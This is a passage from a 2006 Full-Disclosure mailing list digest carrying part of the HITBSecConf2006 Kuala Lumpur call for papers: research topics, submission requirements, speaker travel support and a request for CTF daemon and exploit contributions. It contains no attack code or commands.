* Identification and Entity Authentication
* Network Protocol and Analysis
* Smart Card Security
* Virus and Worms
* WLAN and Bluetooth Security.
* Analysis of malicious code
* Applications of cryptographic techniques,
* Analysis of attacks against networks and machines
* Denial-of-service attacks and countermeasures
* File system security
* Security in heterogeneous and large-scale environments
* Techniques for developing secure systems

PLEASE NOTE: We do not accept product or vendor related pitches. If your
talk involves an advertisement for a new product or service your company
is offering, please do not submit.

Your submission should include:

* Name, title, address, email and phone/contact number
* Draft of the proposed presentation (in PDF or PowerPoint format),
proof of concept for tools and exploits, etc.
* Short biography, qualification, occupation, achievement and
affiliations (limit 150 words).
* Summary or abstract for your presentation (limit 250 words)
* Time (45-60 minutes including time for discussion and questions)
* Technical requirements (video, internet, wireless, audio, etc.)

Each non-resident speaker will receive accommodation for 3 nights at The
Westin Kuala Lumpur. For each non-resident speaker, HITB will cover
travel expenses (through our airline partner, Malaysia Airlines) up to
USD 1,000.00. 

HITBSecConf2006 CTF Daemons/Flags

As part of our annual conference, HITB organizes an attack and defense
"hack-game" commonly referred to as *Capture The Flag* or CTF. As part
of our continued efforts to improve on the game and raise the bar each
year, we are inviting speakers to contribute a daemon and exploit for
this year's CTF competition. For further details on the submission
process, kindly e-mail dinesh -at- hackinthebox.org or ctfinfo -at-
hackinthebox.org.

On behalf of The HITB Team, we thank you and look forward to receiving
your submissions! See you guys in September!

HITBSecConf2006 - Malaysia: Deep-Knowledge Network Security 
http://conference.hackinthebox.org/hitbsecconf2006kl/ 
http://conference.hitb.org/hitbsecconf2006kl/ 



------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

End of Full-Disclosure Digest, Vol 13, Issue 8
**********************************************


